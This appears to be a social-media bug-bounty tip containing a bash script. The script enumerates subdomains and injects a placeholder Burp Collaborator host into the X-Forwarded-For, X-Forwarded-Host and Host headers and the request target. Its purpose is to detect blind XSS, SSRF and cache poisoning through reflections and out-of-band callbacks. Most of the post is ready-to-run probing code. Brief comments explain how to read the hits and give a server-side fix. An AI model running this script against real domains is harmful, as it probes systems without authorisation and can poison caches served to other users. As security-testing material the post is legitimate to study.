magikh0e :unverified: · @magikh0e

Checking for blind XSS/SSRF in request headers & via cache poisoning

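# Header-reflection check for the domains listed in urls.txt (one per line).
# assetfinder expands each domain into subdomains and httprobe keeps the ones
# that answer over HTTP(S); every surviving URL is then requested four times.
#
# "xss.burpcollaboratorhost" / "burpcollaboratorhost" are placeholders for the
# tester's own out-of-band interaction host.
#
# Reading the results:
#   - Methods 1-3 print the response lines that contain "xss". A hit means the
#     application echoed a client-supplied header value into the page; if a
#     shared cache stores that response, the reflection is served to other
#     users (cache poisoning). `grep xss` also matches any page that merely
#     contains the string "xss", so every hit needs manual confirmation.
#   - Blind cases produce no local output at all; they only show up as
#     DNS/HTTP interactions logged by the out-of-band host.
#   - Fix on the server side: build absolute URLs from a configured hostname
#     rather than from Host / X-Forwarded-Host, and strip or cache-key these
#     headers at the edge.
assetfinder --subs-only < urls.txt | httprobe | while read -r url; do
  # --max-time keeps one unresponsive host from stalling the whole loop.
  xss1=$(curl -s -L --max-time 10 "$url" -H 'X-Forwarded-For: xss.burpcollaboratorhost' | grep xss)
  xss2=$(curl -s -L --max-time 10 "$url" -H 'X-Forwarded-Host: xss.burpcollaboratorhost' | grep xss)
  xss3=$(curl -s -L --max-time 10 "$url" -H 'Host: xss.burpcollaboratorhost' | grep xss)

  # Method 4 overrides the request target; the response body is not inspected,
  # so it is discarded and any result is observed out-of-band only.
  curl -s -L "$url" --request-target burpcollaboratorhost/ --max-time 2 > /dev/null

  # printf with %s prints reflected content verbatim; echo -e would interpret
  # backslash sequences coming from the remote response.
  printf '%s\nMethod[1] X-Forwarded-For: xss+ssrf => %s\nMethod[2] X-Forwarded-Host: xss+ssrf ==> %s\nMethod[3] Host: xss+ssrf ==> %s\nMethod[4] GET xss.burpcollaboratorhostHTTP/1 \n\n' \
    "$url" "$xss1" "$xss2" "$xss3"
done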

github.com/tomnomnom/assetfinder
github.com/tomnomnom/httprobe

#ssrf #xss #bugbounty #bugbountytips #burpsuite #assetfinder #httprobe #blindinjection #owasp

Last updated 2 years ago